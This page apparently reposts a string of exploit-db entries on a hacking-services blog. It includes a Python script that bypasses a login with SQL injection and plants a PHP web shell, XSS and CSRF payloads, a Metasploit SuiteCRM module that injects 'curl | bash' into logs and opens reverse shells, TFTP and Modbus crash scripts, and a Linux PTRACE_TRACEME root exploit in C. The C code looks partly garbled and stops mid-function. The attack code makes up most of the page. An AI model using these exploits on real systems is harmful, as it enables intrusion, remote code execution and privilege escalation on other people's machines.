Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863134037

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 11/11/2021
# Exploit Author: Mohammed Aadhil Ashfaq
# Vendor Homepage: https://form2email.dwbooster.com/
# Version: 1.3.24
# Tested on: wordpress

POC
1. Click Contact form to Email
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
2. Create new form name with <script>alert(1)</script>
3. Click Publish
4. XSS has been triggered
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
5. Open a different browser, logged in with wordpress. Copy the URL and
Press enter. XSS will trigger.
HireHackking 
# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
# Date: 15/11/2021
# Exploit Author: djebbaranon
# Vendor Homepage: https://github.com/oretnom23
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
# Version: 2.0
# Tested on: Kali linux / Windows 10
# CVE : CVE-2021-42580

#!/usr/bin/python3
import os
import time
import argparse
import requests
import sys
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
init(autoreset=True)
def banner():
	print('''

 _____       _ _              _                       _                     _____  ______ _____ _____ 
|  _  |     | (_)            | |                     (_)                   / __  \ | ___ /  __ |  ___|
| | | |_ __ | |_ _ __   ___  | | ___  __ _ _ __ _ __  _ _ __   __ _  __   _`' / /' | |_/ | /  \| |__  
| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / /   |    /| |   |  __| 
\ \_/ | | | | | | | | |  __/ | |  __| (_| | |  | | | | | | | | (_| |  \ V /./ /___ | |\ \| \__/| |___ 
 \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_|  |_| |_|_|_| |_|\__, |   \_/ \_____/ \_| \_|\____\____/ 
                                                               __/ |                                  
                                                              |___/                                   
		Written by djebbaranon 
		twitter :  @dj3bb4ran0n1
		zone-h : http://zone-h.org/archive/notifier=djebbaranon
''')
banner()
def my_args():
	parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
	parser.add_argument("-u","--url",type=str,required=True,help="url of target")
	parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
	parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
	my_arguments = parser.parse_args()
	return my_arguments
def login_with_sqli_login_bypass(user,passw):
	global session
	global url
	global cookies
	url = my_args().url
	session = requests.Session()
	data = {
	"username" : user,
	"password" : passw,
	}
	try:
		response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
		print( Fore.GREEN + "[+] Logged in succsusfully")
		cookies = response.cookies.get_dict()
		print("[+] your cookie : ")
	except requests.HTTPError as exception:
		print(Fore.RED + "[-] HTTP Error : {}".format(exception))
		sys.exit(1)
login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
def main(shell_name,renamed_shell):
	try:
		payload ={
			"id" : "",
			"faculty_id" : "test",
			"firstname" : "test",
			"lastname" : "test",
			"middlename" : "fsdfsd",
			"dob" : "2021-10-29",
			"gender": "Male",
			"department_id" : "1",
			"email" : "zebi@gmail.com",
			"contact" : "zebii",
			"address" :  "zebii",	
		}
		files = {
			"img" :
				(
					shell_name,
					"<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
					"application/octet-stream",
					)
		}
		vunlerable_file = "/classes/Master.php?f=save_faculty"
		print("[*] Trying to upload webshell ....")
		response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
		print("[+] trying to bruteforce the webshell ....")
		rangee = my_args().range
		for i in range(0,rangee):
			try:
				with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
					if "nikmok" in response3.text and response3.status_code == 200:
						print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
						break
						with open("shell.txt",mode="w+") as writer:
							writer.write(response3.url)
					else:
						print( Fore.RED + "[-] shell not found : " + response3.url)
			except requests.HTTPError as exception2:
				print("[-] HTTP Error : {0} ".format(exception2))
	except requests.HTTPError as error:
		print("[-] HTTP Error : ".format(error))
	command = my_args().command
	with requests.get(response3.url.replace("whoami",command)) as response4:
		print("[*] Executing {} ....".format(command))
		time.sleep(3)
		print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
main("hackerman.php","")
HireHackking 
# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux

# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b

# Steps to reproduce:
1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
2- Use code below to bypass csrf token

ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

    // This is for debugging and can be removed
    xhr.onreadystatechange = function() {
        if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            console.log(xhr.responseText);
        }
    }
	//
    xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
    var xhr = new XMLHttpRequest();
    // This tels it to return it as a HTML document
    xhr.responseType = "document";
    // true on the end of here makes the call asynchronous
	//Edit the path as you want
    xhr.open("GET", "/image-upload", true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            page = xhr.response
            // Get the input element
            input = page.getElementsByTagName("input")[0];
            // Show the token
            alert("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}
getTokenJS();

var POST_URL="/"
getTokenJS();

</script>
</html>

3- Save it as Html file and upload it.
HireHackking 
# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections

Proof of concepts : 

Stored Xss Example: 

1-Login to you'r Dashboard As a low privilege user
2-Click On Basic archives and Employee
3- +Add card Employee
4- Enter your xss payload in parameters
5-On added employee click on "Open Relation Graph"

POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353

Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close

{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}


------------------------------------------------------------------------


File upload Xss example:

1-Click on Basic archives
2-Click on Workplace - + Add card Workplace
3-Select "attachments" icon - +Add attachment + image
4-Upload your svg file with xss payload
5-Click on preview and Right click open in new tab



Request: 
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open

-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
	 xml:space="preserve">
<ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/>
<path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03
	c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341
	c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933
	c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991
	c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875
	c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489
	c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309
	c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876
	c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413
	c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566
	c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156
	c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351
	c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247
	c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331
	z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111
	C434.693,207.929,439.613,203.01,445.731,203.01z"/>
	<script>alert(1)</script>
</svg>
HireHackking

Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS) # Date: 19/10/2021 # Exploit Author: Vasu (tamilan_mkv) # Vendor Homepage: https://www.bludit.com # Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip # Version: bludit-3-13-1 # Tested on: kali linux # CVE : CVE-2021-35323 ### Steps to reproduce 1. Open login page http://localhost:800/admin/login; 2. Enter the username place ``admin"><img src=x onerror=alert(1)>``and enter the password 3. Trigger the malicious javascript code
HireHackking
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'SuiteCRM Log File Remote Code Execution', 'Description' => %q{ This module exploits an input validation error on the log file extension parameter. It does not properly validate upper/lower case characters. Once this occurs, the application log file will be treated as a php file. The log file can then be populated with php code by changing the username of a valid user, as this info is logged. The php code in the file can then be executed by sending an HTTP request to the log file. A similar issue was reported by the same researcher where a blank file extension could be supplied and the extension could be provided in the file name. This exploit will work on those versions as well, and those references are included. }, 'License' => MSF_LICENSE, 'Author' => [ 'M. Cory Billington' # @_th3y ], 'References' => [ ['CVE', '2021-42840'], ['CVE', '2020-28328'], # First CVE ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue. ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit ], 'Platform' => %w[linux unix], 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86], 'Targets' => [ [ 'Linux (x64)', { 'Arch' => ARCH_X64, 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' } } ], [ 'Linux (cmd)', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] }, 'Privileged' => true, 'DisclosureDate' => '2021-04-28', 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']), OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']), OptString.new('PASS', [true, 'Password for administrator', 'admin']), OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]), OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']), OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin']) ] ) end def check authenticate unless @authenticated return Exploit::CheckCode::Unknown unless @authenticated version_check_request = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Home', 'action' => 'About' } } ) return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request version_match = version_check_request.body[/ Version \s \d{1} # Major revision \. \d{1,2} # Minor revision \. \d{1,2} # Bug fix release /x] version = version_match.partition(' ').last if version.nil? || version.empty? about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About" return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.") end patched_version = Rex::Version.new('7.11.18') current_version = Rex::Version.new(version) return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version Exploit::CheckCode::Safe("SuiteCRM #{version}") end def authenticate print_status("Authenticating as #{datastore['USER']}") initial_req = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Users', 'action' => 'Login' } } ) return false unless initial_req && initial_req.code == 200 login = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_post' => { 'module' => 'Users', 'action' => 'Authenticate', 'return_module' => 'Users', 'return_action' => 'Login', 'user_name' => datastore['USER'], 'username_password' => datastore['PASS'], 'Login' => 'Log In' } } ) return false unless login && login.code == 302 res = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Administration', 'action' => 'index' } } ) auth_succeeded?(res) end def auth_succeeded?(res) return false unless res if res.code == 200 print_good("Authenticated as: #{datastore['USER']}") if res.body.include?('Unauthorized access to administration.') print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.") @is_admin = false else print_good("#{datastore['USER']} has administrative rights.") @is_admin = true end @authenticated = true return true else print_error("Failed to authenticate as: #{datastore['USER']}") return false end end def post_log_file(data) send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'index.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'keep_cookies' => true, 'headers' => { 'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView" }, 'data' => data.to_s } ) end def modify_system_settings_file filename = rand_text_alphanumeric(8).to_s extension = '.pHp' @php_fname = filename + extension action = 'Modify system settings file' print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('SaveConfig', nil, nil, 'form-data; name="action"') data.add_part('Configurator', nil, nil, 'form-data; name="module"') data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"') data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"') data.add_part('info', nil, nil, 'form-data; name="logger_level"') data.add_part('Save', nil, nil, 'form-data; name="save"') res = post_log_file(data) check_logfile_request(res, action) end def poison_log_file action = 'Poison log file' if target.arch.first == 'cmd' command_injection = "<?php `curl #{@download_url} | bash`; ?>" else @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}" command_injection = %( <?php `curl #{@download_url} -o #{@meterpreter_fname}; /bin/chmod 700 #{@meterpreter_fname}; /bin/sh -c #{@meterpreter_fname};`; ?> ) end print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('Users', nil, nil, 'form-data; name="module"') data.add_part('1', nil, nil, 'form-data; name="record"') data.add_part('Save', nil, nil, 'form-data; name="action"') data.add_part('EditView', nil, nil, 'form-data; name="page"') data.add_part('DetailView', nil, nil, 'form-data; name="return_action"') data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"') data.add_part(command_injection, nil, nil, 'form-data; name="last_name"') res = post_log_file(data) check_logfile_request(res, action) end def restore action = 'Restore logging to default configuration' print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('SaveConfig', nil, nil, 'form-data; name="action"') data.add_part('Configurator', nil, nil, 'form-data; name="module"') data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"') data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"') data.add_part('fatal', nil, nil, 'form-data; name="logger_level"') data.add_part('Save', nil, nil, 'form-data; name="save"') post_log_file(data) data = Rex::MIME::Message.new data.add_part('Users', nil, nil, 'form-data; name="module"') data.add_part('1', nil, nil, 'form-data; name="record"') data.add_part('Save', nil, nil, 'form-data; name="action"') data.add_part('EditView', nil, nil, 'form-data; name="page"') data.add_part('DetailView', nil, nil, 'form-data; name="return_action"') data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"') data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"') res = post_log_file(data) print_error("Failed - #{action}") unless res && res.code == 301 print_good("Succeeded - #{action}") end def check_logfile_request(res, action) fail_with(Failure::Unknown, "#{action} - no reply") unless res unless res.code == 301 print_error("Failed - #{action}") fail_with(Failure::UnexpectedReply, "Failed - #{action}") end print_good("Succeeded - #{action}") end def execute_php print_status("Executing php code in log file: #{@php_fname}") res = send_request_cgi( { 'uri' => normalize_uri(target_uri, @php_fname), 'keep_cookies' => true } ) fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404 register_files_for_cleanup(@php_fname) register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty? end def on_request_uri(cli, _request) send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) print_good("#{peer} - Payload sent!") end def start_http_server start_service( { 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, 'Path' => resource_uri } } ) @download_url = get_uri end def exploit start_http_server authenticate unless @authenticated fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin modify_system_settings_file poison_log_file execute_php ensure restore if datastore['RESTORECONF'] end end
HireHackking

Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)

HACKER · %s · %s

# Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-19 # Vendor Homepage: http://www.ipuptime.net/ # Software Link : http://ipuptime.net/PinkieSetup.zip # Tested Version: 2.15 # Vulnerability Type: Buffer Overflow (DoS) Remote # Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: Pinkie 2.15 TFTP Remote Buffer Overflow # Steps to reproduce: # 1. - Download and install Pinkie 2.15 # 2. - Start TFTP Server listening on port 69 # 3. - Run the Script from remote PC/IP # 4. - Crashed #!/usr/bin/env python3 import socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) read = ( #Request - read b'\x00\x01' #Static - opcode + b')' * 32768 + #String - source_file (mutant, size=32768, orig val: b'File.bin') b'\x00' #Delim - delim1 b'netascii' #String - transfer_mode b'\x00' #Delim - delim2 ) sock.sendto(read, ('192.168.1.207', 69)) sock.recv(65535) sock.close()
HireHackking

Modbus Slave 7.3.1 - Buffer Overflow (DoS)

HACKER · %s · %s

# Exploit Title: Modbus Slave 7.3.1 - Buffer Overflow (DoS) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-19 # Vendor Homepage: https://www.modbustools.com/ # Software Link : https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe # Tested Version: 7.3.1 < 7.4.2 # Vulnerability Type: Buffer Overflow (DoS) Local # Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: Modbus Slave 7.3.1 < 7.4.2 Buffer Overflow # Steps to reproduce: # 1. - Download and install Modbus Slave # 2. - Run the python script and it will create modbus.txt file. # 3. - Modbus Slave 7.3.1 < 7.4.2 # 4. - Connection -> Connect # 5. - Paste the characters of txt file Registration Key # 6. - press "ok" button # 7. - Crashed #!/usr/bin/python exploit = 'A' * 736 try: file = open("Modbus.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")
HireHackking
# Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection # Date: 20/11/2021 # Exploit Author: Ilker Burak ADIYAMAN # Vendor Homepage: https://aimeos.org # Software Link: https://aimeos.org/laravel-ecommerce-package # Version: Aimeos 2021.10 LTS # Tested on: MacOSX *Description:* The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter on the json api. ==================== 1. SQLi ==================== https://127.0.0.1/default/jsonapi/review?sort=-ctime The "sort" parameter is vulnerable to SQL injection, reveals table and column names. step 1 : Copy json api GET request above. step 2 : Change sort parameter value to -- ---------------------------------------------------------------------- Parameter: sort (GET) Type: error based Title: GET parameter 'sort' appears to be injectable Payload: sort=--
HireHackking
# Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2) # Date: 11/22/21 # Exploit Author: Ujas Dhami # Version: 4.19 - 5.2.1 # Platform: Linux # Tested on: # ~ Ubuntu 19.04 kernel 5.0.0-15-generic # ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64 # ~ Kali Linux kernel 4.19.0-kali5-amd64 # CVE: CVE-2019-13272 // .... // Original discovery and exploit author: Jann Horn // https://bugs.chromium.org/p/project-zero/issues/detail?id=1903 // Modified exploit code of: BColes // https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272 // .... // ~ Uses the PolKit_Exec frontend. // ~ PolKit_Action is branched. // ~ Search is optimized. // ~ Trunks attain search priority upon execution. // .... // ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme // ujas@kali:~$ ./exploit_traceme // Welcome to your Arsenal! // accessing variables... // execution has reached EOP. // familiar trunks are been searched ... // trunk helper found: /usr/sbin/mate-power-backlight-helper // helper initiated: /usr/sbin/mate-power-backlight-helper // SUID process is being initiated (/usr/bin/pkexec) ... // midpid is being traced... // midpid attached. // root@kali:/home/ujas# // .... #include <ctype.h> #include <assert.h> #include <conio.h> #include <stdio.h> #include <sys/syscall.h> #include <sys/stat.h> #include <fcntl.h> #include <sched.h> #include <stddef.h> #include <sys/user.h> #include <linux/elf.h> #include <stdarg.h> #include <pwd.h> #include <sys/prctl.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <signal.h> #define _GNU_SOURCE #define DEBUG #ifdef DEBUG #define dprintf printf #endif #define max(a,b) ((a)>(b) ? (a) : (b)) #define eff(expr) ({ \ typeof(expr) __res = (expr); \ if (__res == -1) { \ dprintf("[-] Error: %s\n", #expr); \ return 0; \ } \ __res; \ }) struct stat st; const char *trunk[1024]; const char *trunks_rec[] = { "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper", "/usr/sbin/mate-power-backlight-helper", "/usr/lib/gnome-settings-daemon/gsd-backlight-helper", "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper", "/usr/lib/unity-settings-daemon/usd-backlight-helper", "/usr/bin/xfpm-power-backlight-helper", "/usr/bin/lxqt-backlight_backend", "/usr/lib/gsd-backlight-helper", "/usr/lib/gsd-wacom-led-helper", "/usr/lib/gsd-wacom-oled-helper", "/usr/libexec/gsd-wacom-led-helper", "/usr/libexec/gsd-wacom-oled-helper", "/usr/libexec/gsd-backlight-helper", }; static int trace_align[2]; static const char *path_exec = "/usr/bin/pkexec"; static const char *path_action = "/usr/bin/pkaction"; static int fd = -1; static int pipe_stat; static const char *term_sh = "/bin/bash"; static int mid_succ = 1; static const char *path_doublealign; static char *tdisp(char *fmt, ...) { static char overlayfs[10000]; va_list ap; va_start(ap, fmt); vsprintf(overlayfs, fmt, ap); va_end(ap); return overlayfs; } static int middle_main(void *overlayfs) { prctl(PR_SET_PDEATHSIG, SIGKILL); pid_t middle = getpid(); fd = eff(open("/proc/_fd/exe", O_RDONLY)); pid_t child = eff(fork()); if (child == 0) { prctl(PR_SET_PDEATHSIG, SIGKILL); eff(dup2(fd, 42)); int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY)); char *threadv = tdisp("\nUid:\t%d\t0\t", getuid()); eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL)); execl(path_exec, basename(path_exec), NULL); while (1) { char overlayfs[1000]; ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0)); overlayfs[buflen] = '\0'; if (strstr(overlayfs, threadv)) break; } dprintf("SUID execution failed."); exit(EXIT_FAILURE); } eff(dup2(fd, 0)); eff(dup2(trace_align[1], 1)); struct passwd *pw = getpwuid(getuid()); if (pw == NULL) { dprintf("err: username invalid/failed to fetch username"); exit(EXIT_FAILURE); } mid_succ = 1; execl(path_exec, basename(path_exec), "--user", pw->pw_name, path_doublealign, "--help", NULL); mid_succ = 0; dprintf("err: pkexec execution failed."); exit(EXIT_FAILURE); } static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) { struct user_regs_struct regs; struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) }; eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL)); eff(waitpid(pid, &pipe_stat, 0)); eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev)); unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL; struct injected_page { unsigned long inj_arse[2]; unsigned long environment[1]; char arg0[8]; char path[1]; } ipage = { .inj_arse = { inject_surface + offsetof(struct injected_page, arg0) } }; strcpy(ipage.arg0, arg0); for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) { unsigned long pro_d = ((unsigned long *)&ipage)[i]; eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long), (void*)pro_d)); } eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev)); eff(ptrace(PTRACE_DETACH, pid, 0, NULL)); eff(waitpid(pid, &pipe_stat, 0)); regs.orig_rax = __NR_execveat; regs.rdi = exec_fd; regs.rsi = inject_surface + offsetof(struct injected_page, path); regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse); regs.r10 = inject_surface + offsetof(struct injected_page, environment); regs.r8 = AT_EMPTY_PATH; } static int stag_2(void) { pid_t child = eff(waitpid(-1, &pipe_stat, 0)); timeexecbuffer(child, 42, "stage3"); return 0; } static int sh_spawn(void) { eff(setresgid(0, 0, 0)); eff(setresuid(0, 0, 0)); execlp(term_sh, basename(term_sh), NULL); dprintf("err: Shell spawn unsuccessful.", term_sh); exit(EXIT_FAILURE); } static int check_env(void) { const char* xdg_session = getenv("XDG_SESSION_ID"); dprintf("accessing variables...\n"); if (stat(path_action, &st) != 0) { dprintf("err: pkaction not found at %s.", path_action); exit(EXIT_FAILURE); } if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) { dprintf("warn: PolKit agent not found.\n"); return 1; } if (stat("/usr/sbin/getsebool", &st) == 0) { if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) { dprintf("warn: [deny_ptrace] is enabled.\n"); return 1; } } if (xdg_session == NULL) { dprintf("warn: $XDG_SESSION_ID is not set.\n"); return 1; } if (stat(path_exec, &st) != 0) { dprintf("err: pkexec not found at %s.", path_exec); exit(EXIT_FAILURE); } dprintf("execution has reached EOP.\n"); return 0; } int trunkh() { char cmd[1024]; snprintf(cmd, sizeof(cmd), "%s --verbose", path_action); FILE *fp; fp = 